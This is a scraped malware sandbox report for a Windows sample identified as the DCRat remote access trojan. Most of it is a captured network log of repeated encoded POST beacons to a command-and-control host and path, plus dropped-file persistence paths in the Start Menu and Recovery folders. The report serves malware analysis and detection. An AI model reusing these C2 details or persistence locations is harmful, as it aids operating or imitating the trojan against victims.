Nov 9, 2024 06:52:04.960618973 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0e 1f 23 56 28 58 34 09 24 03 30 01 3b 32 22 0e 25 06 20 41 3b 01 38 58 26 5b 3f 5f 2d 13 0d 0e 20 3b 3e 04 34 3c 25 5e 2b 02 0f 50 35 10 2f 5a 0c 1f 23 59 3c 3d 03 01 30 58 34 11 3b 03 05 44 34 0e 3a 5a 2a 2f 00 0a 31 07 31 14 20 31 26 0a 2a 3e 2a 5a 39 15 0e 18 38 34 3c 13 31 3f 2d 5e 0e 14 23 0a 28 10 03 04 36 1d 21 01 23 22 23 15 20 3e 2f 0c 29 5a 23 52 29 2b 3a 5c 3d 0a 38 1f 36 3e 34 1f 23 32 3e 5e 30 00 2b 5b 26 13 26 52 20 05 20 50 01 35 5c 51 Data Ascii: #V(X4$0;2"% A;8X&[?_- ;>4<%^+P5/Z#Y<=0X4;D4:Z/11 1&>*Z984<1?-^#(6!#"# >/)Z#R)+:\=86>4#2>^0+[&&R P5\Q

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:03.640346050 CET	251	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 2532 Expect: 100-continue
Nov 9, 2024 06:52:04.037201881 CET	2532	OUT	Data Raw: 58 5e 59 5e 50 5e 50 54 5a 5e 55 5a 52 52 5b 55 58 54 5a 41 51 5d 5a 58 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: X^Y^P^PTZ^UZRR[UXTZAQ]ZX^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV!( :$-:#3+:\8W+';!\%,7U$.($Z88&Y%%Z/3
Nov 9, 2024 06:52:04.441049099 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:04.511841059 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3c 57 5a 5b Data Ascii: <WZ[

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:04.832973957 CET	251	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 2528 Expect: 100-continue
Nov 9, 2024 06:52:05.187174082 CET	2528	OUT	Data Raw: 58 50 5c 53 55 5d 55 53 5a 5e 55 5a 52 56 5b 5d 58 5b 5a 49 51 5a 5a 54 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: XP\SU]USZ^UZRV[]X[ZIQZZT^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV!X(#%$X250#-+?0/-Y0& <$'+3?3,,&Y%%Z/
Nov 9, 2024 06:52:05.643697977 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:05.714602947 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3c 57 5a 5b Data Ascii: <WZ[

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:05.888959885 CET	251	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 2532 Expect: 100-continue
Nov 9, 2024 06:52:06.233463049 CET	2532	OUT	Data Raw: 58 51 59 57 50 5b 55 52 5a 5e 55 5a 52 55 5b 55 58 5d 5a 46 51 5c 5a 59 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: XQYWP[URZ^UZRU[UX]ZFQ\ZY^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV!+U2')53E.*8Q<-8V,>:'!!<#T'X'',8;<&Y%%Z//
Nov 9, 2024 06:52:06.729029894 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:06.807697058 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3c 57 5a 5b Data Ascii: <WZ[

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:08.411961079 CET	251	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 2532 Expect: 100-continue
Nov 9, 2024 06:52:08.765247107 CET	2532	OUT	Data Raw: 5d 54 5c 57 55 5e 55 50 5a 5e 55 5a 52 54 5b 52 58 5d 5a 47 51 58 5a 5c 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: ]T\WU^UPZ^UZRT[RX]ZGQXZ\^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV"<#6Z'=>5U#C.T=-48-"0/6 Y3P'<F0,(V8,&Y%%Z/+
Nov 9, 2024 06:52:09.212600946 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:09.288517952 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3c 57 5a 5b Data Ascii: <WZ[

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:09.982784986 CET	275	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 1852 Expect: 100-continue Connection: Keep-Alive
Nov 9, 2024 06:52:10.327316999 CET	1852	OUT	Data Raw: 58 52 59 55 50 5e 50 50 5a 5e 55 5a 52 57 5b 5d 58 58 5a 44 51 5c 5a 5d 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: XRYUP^PPZ^UZRW[]XXZDQ\Z]^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV"+1'-:!#?.)/(#,%/%U#3T'$A3?',<&Y%%Z/'
Nov 9, 2024 06:52:10.800837994 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:10.880170107 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0e 1f 20 0a 29 3e 37 12 27 14 33 5e 3b 0b 3e 08 24 3b 30 45 3b 59 20 59 31 3d 38 01 2e 5b 20 50 34 02 31 10 23 12 0b 58 28 3c 21 15 22 10 2f 5a 0c 1f 20 05 3c 2e 3d 04 33 2e 33 03 2d 2d 0d 0b 23 19 35 00 28 2c 36 0b 26 07 2e 02 34 31 29 19 2a 3d 2e 1f 2f 2b 01 02 2c 09 0e 5e 26 3f 2d 5e 0e 14 20 19 3f 3d 3d 05 21 55 26 5c 34 32 28 05 37 07 2c 53 2a 2c 01 19 2b 2b 22 1e 28 20 3c 56 35 5b 23 0a 36 21 2e 5e 30 39 28 00 27 29 26 52 20 05 20 50 01 35 5c 51 Data Ascii: )>7'3^;>$;0E;Y Y1=8.[ P41#X(<!"/Z <.=3.3--#5(,6&.41)=./+,^&?-^ ?==!U&\42(7,S,++"( <V5[#6!.^09(')&R P5\Q

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:10.726809978 CET	275	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Nov 9, 2024 06:52:11.077294111 CET	2532	OUT	Data Raw: 58 52 59 56 55 59 50 53 5a 5e 55 5a 52 5e 5b 52 58 5c 5a 40 51 5e 5a 5b 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: XRYVUYPSZ^UZR^[RX\Z@Q^Z[^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV!Y+0:[0="!(-8T(+/>:$6!/T$?$S-,&Y%%Z/
Nov 9, 2024 06:52:11.544234991 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:11.615269899 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3c 57 5a 5b Data Ascii: <WZ[

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:12.118658066 CET	251	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 2532 Expect: 100-continue
Nov 9, 2024 06:52:12.468199968 CET	2532	OUT	Data Raw: 5d 52 59 56 55 5d 50 54 5a 5e 55 5a 52 55 5b 5d 58 5e 5a 43 51 5a 5a 5f 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: ]RYVU]PTZ^UZRU[]X^ZCQZZ_^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV"()3"3?E::0W=.(8%$64/<'-$C'?,&Y%%Z//
Nov 9, 2024 06:52:12.927620888 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:13.001573086 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3c 57 5a 5b Data Ascii: <WZ[

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:13.289010048 CET	275	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Nov 9, 2024 06:52:13.639794111 CET	2532	OUT	Data Raw: 58 5e 59 51 55 5d 55 50 5a 5e 55 5a 52 55 5b 55 58 55 5a 46 51 5b 5a 5b 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: X^YQU]UPZ^UZRU[UXUZFQ[Z[^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV!X(6'=!5#E-)4U(#;!Z$,>4/$0-$C0/',,&Y%%Z//
Nov 9, 2024 06:52:14.098284960 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:14.169821024 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3c 57 5a 5b Data Ascii: <WZ[

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:15.895714045 CET	275	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 1828 Expect: 100-continue Connection: Keep-Alive
Nov 9, 2024 06:52:16.249207973 CET	1828	OUT	Data Raw: 5d 55 5c 55 55 5a 55 54 5a 5e 55 5a 52 5e 5b 5d 58 5c 5a 42 51 5e 5a 54 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: ]U\UUZUTZ^UZR^[]X\ZBQ^ZT^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV"()'!!U8.9,?>+,>'/=R!,30-<'',&Y%%Z/
Nov 9, 2024 06:52:16.714013100 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:16.784739971 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0e 1f 23 1c 2b 10 34 0e 33 39 37 1d 38 0c 3d 57 25 38 24 40 2c 01 28 5d 27 2d 38 01 3a 3d 33 08 22 2b 21 10 37 2c 2d 58 2b 2c 29 18 22 10 2f 5a 0c 1f 23 5c 3c 03 0c 5d 33 3e 06 5a 2d 2d 05 09 23 51 22 5f 2b 01 2d 55 26 58 25 5c 21 31 32 0f 2a 5b 2a 11 39 3b 0e 5a 3b 34 28 58 31 3f 2d 5e 0e 14 20 56 28 2d 3e 1e 36 0a 3d 01 21 32 2b 58 37 3d 38 57 29 12 3f 51 3f 16 00 5b 28 23 20 52 36 03 2f 0d 21 32 2e 58 27 5f 3f 10 26 29 26 52 20 05 20 50 01 35 5c 51 Data Ascii: #+43978=W%8$@,(]'-8:=3"+!7,-X+,)"/Z#\<]3>Z--#Q"_+-U&X%\!12[9;Z;4(X1?-^ V(->6=!2+X7=8W)?Q?[(# R6/!2.X'_?&)&R P5\Q

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:16.999834061 CET	275	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Nov 9, 2024 06:52:17.358985901 CET	2532	OUT	Data Raw: 58 51 59 51 55 52 50 50 5a 5e 55 5a 52 53 5b 57 58 5f 5a 49 51 58 5a 55 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: XQYQURPPZ^UZRS[WX_ZIQXZU^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV"(6\'.V!3'D.*+ V8='<9S!/$>%?'/<&Y%%Z/7
Nov 9, 2024 06:52:17.817081928 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:17.892766953 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3c 57 5a 5b Data Ascii: <WZ[

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:18.457050085 CET	275	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Nov 9, 2024 06:52:18.811691999 CET	2532	OUT	Data Raw: 58 5f 5c 55 55 53 55 5c 5a 5e 55 5a 52 5e 5b 5c 58 55 5a 48 51 58 5a 5d 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: X_\UUSU\Z^UZR^[\XUZHQXZ]^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV!<:]$X."0;98V=.3,>"'Z"#,'%>0'<8,&Y%%Z/
Nov 9, 2024 06:52:19.274101019 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:19.352344990 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3c 57 5a 5b Data Ascii: <WZ[

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QMT2731i8k.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\1f2b6125644fa3

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe:Zone.Identifier

C:\Recovery\1f2b6125644fa3

C:\Recovery\qioiNOJzhriMVnsRuLz.exe

C:\Recovery\qioiNOJzhriMVnsRuLz.exe:Zone.Identifier

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\QMT2731i8k.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\qioiNOJzhriMVnsRuLz.exe.log

C:\Users\user\AppData\Local\Temp\04dAibpg9m

C:\Users\user\AppData\Local\Temp\0gX2NIXfZT

C:\Users\user\AppData\Local\Temp\1DWFOJQ0h7

Windows Analysis Report
QMT2731i8k.exe

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:19.610179901 CET	275	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Nov 9, 2024 06:52:19.967928886 CET	2532	OUT	Data Raw: 5d 52 59 56 55 52 55 5d 5a 5e 55 5a 52 51 5b 50 58 5f 5a 44 51 52 5a 5c 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: ]RYVURU]Z^UZRQ[PX_ZDQRZ\^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV"?*09"<::<X8,-5['/=W4,#'-8@0,,&Y%%Z/
Nov 9, 2024 06:52:20.419691086 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:20.497009993 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3c 57 5a 5b Data Ascii: <WZ[

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:20.739691973 CET	275	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Nov 9, 2024 06:52:21.093257904 CET	2532	OUT	Data Raw: 58 51 59 50 50 5f 55 56 5a 5e 55 5a 52 53 5b 54 58 5e 5a 42 51 5e 5a 58 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: XQYPP_UVZ^UZRS[TX^ZBQ^ZX^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV!X< -'X:53 -8P?>;-=\0?: /0.<'/,&Y%%Z/7
Nov 9, 2024 06:52:21.549331903 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:21.625051022 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3c 57 5a 5b Data Ascii: <WZ[

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:21.777827978 CET	275	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Nov 9, 2024 06:52:22.124279022 CET	2532	OUT	Data Raw: 58 54 59 53 50 59 55 53 5a 5e 55 5a 52 54 5b 50 58 5e 5a 44 51 5d 5a 58 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: XTYSPYUSZ^UZRT[PX^ZDQ]ZX^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV!_<3^$..P!3'.)/+ --0/"#,'F3?/8&Y%%Z/+
Nov 9, 2024 06:52:22.615432978 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:22.691092014 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3c 57 5a 5b Data Ascii: <WZ[

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:21.802108049 CET	275	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 1836 Expect: 100-continue Connection: Keep-Alive
